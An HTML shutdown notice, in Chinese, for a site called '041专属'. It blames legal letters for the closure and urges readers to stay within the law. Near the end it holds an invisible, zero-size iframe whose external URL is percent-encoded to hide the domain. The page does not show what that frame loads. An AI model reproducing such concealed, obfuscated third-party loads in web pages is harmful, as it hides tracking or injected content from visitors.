<!DOCTYPE html>
<html lang="cmn-hans">
<head>
  <link rel="shortcut icon" href="./tp/favicon.png" >
  <link rel="Bookmark" href="./tp/favicon.png">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="renderer" content="webkit">
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no">
  <title>041专属 - 没了呐...</title>
  <meta name="keywords" content="041专属">
  <meta name="description"
    content="041专属">
  <meta name="author" content="Pandaren">
  <meta name="format-detection" content="telephone=no">

  <link rel="shortcut icon" type="image/x-icon"
    href="./94e39825dc4e751af82bc68dd1152453.ico">
  <style>

    body {
      background-color: #2e2a3c;
      color: #f0f0f0;
      background: url("./tp/bj.jpg");
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    #bye {
      width: 100%;
      height: 100%;
    }

    #pic {
      width: 40%;
      max-width: 200px;
      margin: 40px auto;
      border-radius: 50%;
    }

    #pic img {
      display: block;
      width: 100%;
      border-radius: 50%;
    }

    #pic .hover {
      display: none;
    }

    #pic .normal {
      display: block;
    }

    #pic.next .hover {
      display: block;
    }

    #pic.next .normal {
      display: none;
    }

    #bye .letter,
    #bye .message {
      max-width: 800px;
      padding: 0 20px;
      margin: 0 auto;
      line-height: 1.7;
      font-size: 14px;
    }

    #bye .letter h3 {
      font-size: 14px;
      padding-bottom: 10px;
      font-weight: normal;
    }

    #bye .letter p {
      padding: 6px 0;
      text-indent: 2em;
    }

    #bye .sign {
      padding: 6px 0;
      text-align: right;
    }

    #bye .sign p {
      padding: 0;
    }

    #bye .message {
      padding: 20px;
      margin-top: 100px;
      background-color: rgba(0, 0, 0, .15);
    }

    #bye .message h3 {
      text-align: left;
      font-size: 14px;
      font-weight: normal;
      padding-bottom: 20px;
      color: #dfdfdf;
    }

    #bye .message p {
      padding: 6px 0;
      color: #acaca9;
    }

    #bye .message .box {
      padding: 10px 0 50px 0;
      text-align: center;
    }

    #bye .connect {
      padding: 40px 20px;
      font-size: 14px;
      text-align: center;
    }

    #bye .connect span {
      padding: 0 10px;
    }

    #bye .connect a,
    #bye .connect b {
      color: #1cd39b;
      font-weight: normal;
    }

    #bye .tks {
      padding: 0 20px 40px 20px;
      font-size: 14px;
      text-align: center;
      color: #acaca9;
    }
  </style>
</head>

<body>
  <div id="bye">
    <div id="pic">
      <img class="normal"
        src="./tp/favicon.png"
        alt=""">
      <img class="hover"
        src="./tp/favicon.png"
        alt=""">
    </div>
	

    <div class="letter">
      <h3>公告：</h3>
      <p>是的，正如你所见——我们停止运营了！</p>
      <p>感谢大家一直以来的支持和厚爱.</p>
      <p>幸运的是，我们还有机会，不久的将来我们会重新相遇.</p>
      <div class="sign">
        <p>041专属</p>
        <p>2023年10月12日</p>
      </div>
    </div>

    <div class="message">
      <h3>附文：</h3>
      <p><b>关闭原因：</b>网站运营期间不断收到律师事务所的律师函，因无法承担继续运营带来的后果，必须要停止运营。</p>
      <p><b>参照案例：</b>前不久某人因网络犯罪涉及金额过大而被判刑，他好歹也是网界一大佬，不想因为这样给我的人生带来影响。</p>
      <p><b>呼吁大家：</b>现在随着法律制度的不断完善，网络并非法外之地，拒绝触犯法律底线，这样才能做一名合格的网民。</p>
      <p>
        <b>......</b>
      </p>

    </div>
<iframe id="tj" src="//%77%77%77%2e%78%63%63%78%2e%63%63/%74%6a%2e%68%74%6d%6c" frameborder="0" height="0" width="0"></iframe>
    <div class="connect">

    <div id="footer">
        <p><span style="color:#48ab18">Copyright</span> <span style="color:#ff0000">041专属</a></span> <span style="color:#9b17ae"> &copy;</span><span style="color:#ca7900"><script>document.write(new Date().getFullYear())</script></span><span style="color:#2720ac"> All Rights Reserved</span>


  </div>

  <!-- 各位的爱与坚持，努力的人对不住啊，你们辛苦了[鞠躬] -->
  
</body>

</html>
